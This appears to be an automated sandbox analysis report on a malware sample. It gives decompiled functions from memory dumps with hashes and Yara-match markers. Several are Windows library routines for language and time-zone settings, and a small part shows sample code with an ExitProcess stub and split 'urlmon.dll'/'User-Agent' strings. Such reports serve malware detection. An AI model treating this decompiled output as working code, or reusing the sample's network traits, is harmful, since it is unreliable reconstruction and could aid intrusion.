                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                      • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                                                                                                                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                      • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041A095, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E0041A095(intOrPtr _a4, int _a8) {
				void* _t13;

				asm("invalid");
				_t7 = _a4;
				E0041A950(_t13, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                                                      0x0041a09d
                                                                                                                                                      0x0041a0a3
                                                                                                                                                      0x0041a0ba
                                                                                                                                                      0x0041a0c8

                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: a8056092284fd02524644ebf374f23c095ed5da5ffe8f5e4d983275d848f4a59
                                                                                                                                                      • Instruction ID: 3d5f5d4bedbb88bf5e9f9553445ff45a8df491e82a87483fb3bdd8882b899343
                                                                                                                                                      • Opcode Fuzzy Hash: a8056092284fd02524644ebf374f23c095ed5da5ffe8f5e4d983275d848f4a59
                                                                                                                                                      • Instruction Fuzzy Hash: 94E046712002046BC220DF98CC96FD73BA8EF09750F018458BA285F241C530AA01CAA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0041A0A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                                                      0x0041a0a3
                                                                                                                                                      0x0041a0ba
                                                                                                                                                      0x0041a0c8

                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A0C8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                      • Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
                                                                                                                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                      • Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 00417295, Relevance: 6.3, Strings: 5, Instructions: 80COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Us$: $er-A$gent$urlmon.dll
                                                                                                                                                      • API String ID: 0-1367105278
                                                                                                                                                      • Opcode ID: f946a7d0305fb40f8302dd9a90a50887b508237da76264f90e3e29e481f10ff2
                                                                                                                                                      • Instruction ID: 64cd22ab9ce93dd56005a1350cd3da3bb9b65097de0912efc11b5753ae22b265
                                                                                                                                                      • Opcode Fuzzy Hash: f946a7d0305fb40f8302dd9a90a50887b508237da76264f90e3e29e481f10ff2
                                                                                                                                                      • Instruction Fuzzy Hash: 26115472E052099AEB109E91AC02BFFBB74EF51714F10015AEC086B341D23D9942CBEE
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 009226F8, Relevance: .0, Instructions: 44COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                      • Instruction ID: 97194e964baab974b63f2182347e793807f5b60ad3d47569104d946c8401b4b0
                                                                                                                                                      • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                                                                      • Instruction Fuzzy Hash: D6F0AF2132C169ABDB58EF18A99177A339DEB94300F54C439E949CB249D625AD408290
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004172A5, Relevance: .0, Instructions: 36COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218059769.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 4d5977a9876430e3fb2b3be42c66cb8de91bd652987bb57eace2de961647bb6b
                                                                                                                                                      • Instruction ID: 751b7d7bf6b9dafb26124e26ff56f5a28b0b219270f3804fe79b0d20a61cbf30
                                                                                                                                                      • Opcode Fuzzy Hash: 4d5977a9876430e3fb2b3be42c66cb8de91bd652987bb57eace2de961647bb6b
                                                                                                                                                      • Instruction Fuzzy Hash: DBE06836E4A1508A6B14ADA9B4050EBFF30E99B2647643297CC1C6B306C62AD851CACA
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00938788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                      			E00938788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00938460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0091E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0093718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00938460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0093718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00938460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00938460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00938460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0093718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00912340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0092E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0091E2A8(_t322,  &_v68, _v16);
								if(E00935553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0092E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0091E2A8(_t322,  &_v68, _t236);
								if(E00935553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0093718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00912340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0092E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0091E2A8(_v12,  &_v68, _v16);
							if(E00935553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0092E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0091E2A8(_t322,  &_v68, _t269);
							if(E00935553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0093718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0091E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00912340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0092E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0091E2A8(_v12,  &_v68, _v16);
						if(E00935553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0092E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0091E2A8(_t322,  &_v68, _t296);
						if(E00935553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0091E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                                                                                                      0x00938788
                                                                                                                                                      0x00938788
                                                                                                                                                      0x00938791
                                                                                                                                                      0x00938794
                                                                                                                                                      0x00938798
                                                                                                                                                      0x0093879b
                                                                                                                                                      0x0093879e
                                                                                                                                                      0x009387a1
                                                                                                                                                      0x009387a4
                                                                                                                                                      0x009387a7
                                                                                                                                                      0x009387aa
                                                                                                                                                      0x009387af
                                                                                                                                                      0x00981ad3
                                                                                                                                                      0x00938b0a
                                                                                                                                                      0x00938b0d
                                                                                                                                                      0x00938b13
                                                                                                                                                      0x00938b19
                                                                                                                                                      0x00938b1f
                                                                                                                                                      0x00938b25
                                                                                                                                                      0x00938b2b
                                                                                                                                                      0x00938b31
                                                                                                                                                      0x00938b37
                                                                                                                                                      0x00938b3d
                                                                                                                                                      0x00938b46
                                                                                                                                                      0x00938b46
                                                                                                                                                      0x009387c6
                                                                                                                                                      0x009387d0
                                                                                                                                                      0x00981ae0
                                                                                                                                                      0x00981ae6
                                                                                                                                                      0x00981af8
                                                                                                                                                      0x00981af8
                                                                                                                                                      0x00981afd
                                                                                                                                                      0x00981afe
                                                                                                                                                      0x00981b01
                                                                                                                                                      0x00981b06
                                                                                                                                                      0x00981b06
                                                                                                                                                      0x009387d6
                                                                                                                                                      0x009387f2
                                                                                                                                                      0x009387f7
                                                                                                                                                      0x00938807
                                                                                                                                                      0x0093880a
                                                                                                                                                      0x0093880f
                                                                                                                                                      0x00938810
                                                                                                                                                      0x00938813
                                                                                                                                                      0x00938818
                                                                                                                                                      0x00938818
                                                                                                                                                      0x0093882c
                                                                                                                                                      0x00938831
                                                                                                                                                      0x00938838
                                                                                                                                                      0x00938908
                                                                                                                                                      0x00938920
                                                                                                                                                      0x009389f0
                                                                                                                                                      0x00938a08
                                                                                                                                                      0x00938af6
                                                                                                                                                      0x00938af6
                                                                                                                                                      0x00938af8
                                                                                                                                                      0x00938afb
                                                                                                                                                      0x00981beb
                                                                                                                                                      0x00981beb
                                                                                                                                                      0x00938b04
                                                                                                                                                      0x00981bf8
                                                                                                                                                      0x00981c0e
                                                                                                                                                      0x00981c13
                                                                                                                                                      0x00981c16
                                                                                                                                                      0x00981c16
                                                                                                                                                      0x00981bf8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00938b04
                                                                                                                                                      0x00938a0e
                                                                                                                                                      0x00938a11
                                                                                                                                                      0x00938a14
                                                                                                                                                      0x00938a15
                                                                                                                                                      0x00938a18
                                                                                                                                                      0x00938a22
                                                                                                                                                      0x00938b59
                                                                                                                                                      0x00938a28
                                                                                                                                                      0x00938a3c
                                                                                                                                                      0x00938a3c
                                                                                                                                                      0x00938a42
                                                                                                                                                      0x00981bb0
                                                                                                                                                      0x00981b11
                                                                                                                                                      0x00981b11
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00938a48
                                                                                                                                                      0x00938a51
                                                                                                                                                      0x00938a5b
                                                                                                                                                      0x00938a5e
                                                                                                                                                      0x00938a61
                                                                                                                                                      0x00938a69
                                                                                                                                                      0x00938a69
                                                                                                                                                      0x00938a6d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00938a74
                                                                                                                                                      0x00938a7c
                                                                                                                                                      0x00938a7d
                                                                                                                                                      0x00938a91
                                                                                                                                                      0x00938a93
                                                                                                                                                      0x00938a93
                                                                                                                                                      0x00938a98
                                                                                                                                                      0x00938a9b
                                                                                                                                                      0x00938aa1
                                                                                                                                                      0x00938aa1
                                                                                                                                                      0x00938aa4
                                                                                                                                                      0x00938aaa
                                                                                                                                                      0x00938ab1
                                                                                                                                                      0x00938ac5
                                                                                                                                                      0x00938ac7
                                                                                                                                                      0x00938ac7
                                                                                                                                                      0x00938ac5
                                                                                                                                                      0x00938ace
                                                                                                                                                      0x00981bc9
                                                                                                                                                      0x00981bce
                                                                                                                                                      0x00981bd2
                                                                                                                                                      0x00981bd2
                                                                                                                                                      0x00938ad8
                                                                                                                                                      0x00938aeb
                                                                                                                                                      0x00938aeb
                                                                                                                                                      0x00938af0
                                                                                                                                                      0x00938af4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00938af4
                                                                                                                                                      0x00938a42
                                                                                                                                                      0x00938926
                                                                                                                                                      0x00938929
                                                                                                                                                      0x0093892c
                                                                                                                                                      0x0093892d
                                                                                                                                                      0x00938930
                                                                                                                                                      0x00938935
                                                                                                                                                      0x0093893a
                                                                                                                                                      0x00938b51
                                                                                                                                                      0x00938940
                                                                                                                                                      0x00938954
                                                                                                                                                      0x00938954
                                                                                                                                                      0x0093895a
                                                                                                                                                      0x00981b63
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00938960
                                                                                                                                                      0x00938969
                                                                                                                                                      0x00938973
                                                                                                                                                      0x00938976
                                                                                                                                                      0x00938979
                                                                                                                                                      0x0093897e
                                                                                                                                                      0x00938981
                                                                                                                                                      0x00938981
                                                                                                                                                      0x00938986
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00981b6e
                                                                                                                                                      0x00981b74
                                                                                                                                                      0x00981b7b
                                                                                                                                                      0x00981b8f
                                                                                                                                                      0x00981b91
                                                                                                                                                      0x00981b91
                                                                                                                                                      0x00981b99
                                                                                                                                                      0x00981b9c
                                                                                                                                                      0x00981ba2
                                                                                                                                                      0x00981ba2
                                                                                                                                                      0x0093898c
                                                                                                                                                      0x00938992
                                                                                                                                                      0x00938999
                                                                                                                                                      0x009389ad
                                                                                                                                                      0x00981ba8
                                                                                                                                                      0x00981ba8
                                                                                                                                                      0x009389ad
                                                                                                                                                      0x009389b6
                                                                                                                                                      0x009389c8
                                                                                                                                                      0x009389cd
                                                                                                                                                      0x009389d0
                                                                                                                                                      0x009389d0
                                                                                                                                                      0x009389d6
                                                                                                                                                      0x009389e8
                                                                                                                                                      0x009389e8
                                                                                                                                                      0x009389ed
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009389ed
                                                                                                                                                      0x0093895a
                                                                                                                                                      0x0093883e
                                                                                                                                                      0x00938841
                                                                                                                                                      0x00938844
                                                                                                                                                      0x00938845
                                                                                                                                                      0x00938848
                                                                                                                                                      0x0093884d
                                                                                                                                                      0x00938852
                                                                                                                                                      0x00938b49
                                                                                                                                                      0x00938858
                                                                                                                                                      0x0093886c
                                                                                                                                                      0x0093886c
                                                                                                                                                      0x00938872
                                                                                                                                                      0x00981b0e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00938878
                                                                                                                                                      0x00938881
                                                                                                                                                      0x0093888b
                                                                                                                                                      0x0093888e
                                                                                                                                                      0x00938891
                                                                                                                                                      0x00938896
                                                                                                                                                      0x00938899
                                                                                                                                                      0x00938899
                                                                                                                                                      0x0093889e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00981b21
                                                                                                                                                      0x00981b27
                                                                                                                                                      0x00981b2e
                                                                                                                                                      0x00981b42
                                                                                                                                                      0x00981b44
                                                                                                                                                      0x00981b44
                                                                                                                                                      0x00981b4c
                                                                                                                                                      0x00981b4f
                                                                                                                                                      0x00981b55
                                                                                                                                                      0x00981b55
                                                                                                                                                      0x009388a4
                                                                                                                                                      0x009388aa
                                                                                                                                                      0x009388b1
                                                                                                                                                      0x009388c5
                                                                                                                                                      0x00981b5b
                                                                                                                                                      0x00981b5b
                                                                                                                                                      0x009388c5
                                                                                                                                                      0x009388ce
                                                                                                                                                      0x009388e0
                                                                                                                                                      0x009388e5
                                                                                                                                                      0x009388e8
                                                                                                                                                      0x009388e8
                                                                                                                                                      0x009388ee
                                                                                                                                                      0x00938900
                                                                                                                                                      0x00938900
                                                                                                                                                      0x00938905
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00938905

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • Kernel-MUI-Language-Disallowed, xrefs: 00938914
                                                                                                                                                      • Kernel-MUI-Language-Allowed, xrefs: 00938827
                                                                                                                                                      • WindowsExcludedProcs, xrefs: 009387C1
                                                                                                                                                      • Kernel-MUI-Language-SKU, xrefs: 009389FC
                                                                                                                                                      • Kernel-MUI-Number-Allowed, xrefs: 009387E6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcspbrk
                                                                                                                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                      • API String ID: 402402107-258546922
                                                                                                                                                      • Opcode ID: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
                                                                                                                                                      • Instruction ID: 7933886f3f67479ed92c2c05ac5fc6f875a652e98cfaea1cb7981e3f0119657d
                                                                                                                                                      • Opcode Fuzzy Hash: ce9806898184e62619ce85bde7b7d4e482c459d6ada83373159015600ac85896
                                                                                                                                                      • Instruction Fuzzy Hash: 4EF1C4B2D00249EFCF11EF95C981AEEB7B8FB48300F15446AF505A7611EB35AA85DF60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 009A822C, Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                      			E009A822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v8;
				void* __ebx;
				signed int _t41;
				void* _t42;
				signed int* _t50;
				void* _t71;
				void* _t73;
				void* _t78;
				signed int _t81;
				void* _t84;

				_push(__ecx);
				_t81 = _a4;
				_t84 = 0x20;
				_t71 = E009C5A34(_t81 + 4, _t84);
				if(_t71 < _t84) {
					_t41 = E009C5A34(_t81 + 0x58, _t84);
					_pop(_t78);
					_a4 = _t41;
					__eflags = _t41 - _t84;
					if(_t41 >= _t84) {
						goto L1;
					} else {
						_t42 = E00967DCD(1,  &_v8);
						__eflags = _t42;
						if(__eflags >= 0) {
							__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
							if(__eflags < 0) {
								L14:
								_a4 = 0;
								_t73 = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
								__eflags = _t73;
								if(__eflags >= 0) {
									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
									_t50 =  &_a8;
									goto L16;
								}
							} else {
								_t8 = _t71 + 2; // 0x2
								__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
								if(__eflags < 0) {
									goto L14;
								} else {
									_t71 = 4;
									__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
									if(__eflags < 0) {
										goto L14;
									} else {
										__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
										if(__eflags < 0) {
											goto L14;
										} else {
											__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
											if(__eflags < 0) {
												goto L14;
											} else {
												__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
												if(__eflags < 0) {
													goto L14;
												} else {
													__eflags = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
													if(__eflags < 0) {
														goto L14;
													} else {
														__eflags = _a8 - 0x1b0;
														if(__eflags < 0) {
															goto L14;
														} else {
															_t73 = E009A810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
															__eflags = _t73;
															if(__eflags >= 0) {
																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
																_t50 =  &_a4;
																L16:
																_t73 = E009A810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
															}
														}
													}
												}
											}
										}
									}
								}
							}
							E0090F9F0(_v8);
							_t42 = _t73;
						}
					}
				} else {
					L1:
					_t42 = 0xc000000d;
				}
				return _t42;
			}













                                                                                                                                                      0x009a8231
                                                                                                                                                      0x009a8235
                                                                                                                                                      0x009a823a
                                                                                                                                                      0x009a8245
                                                                                                                                                      0x009a824b
                                                                                                                                                      0x009a825c
                                                                                                                                                      0x009a8262
                                                                                                                                                      0x009a8263
                                                                                                                                                      0x009a8266
                                                                                                                                                      0x009a8268
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009a826a
                                                                                                                                                      0x009a8270
                                                                                                                                                      0x009a8275
                                                                                                                                                      0x009a8277
                                                                                                                                                      0x009a8295
                                                                                                                                                      0x009a8297
                                                                                                                                                      0x009a838d
                                                                                                                                                      0x009a8391
                                                                                                                                                      0x009a83a9
                                                                                                                                                      0x009a83ab
                                                                                                                                                      0x009a83ad
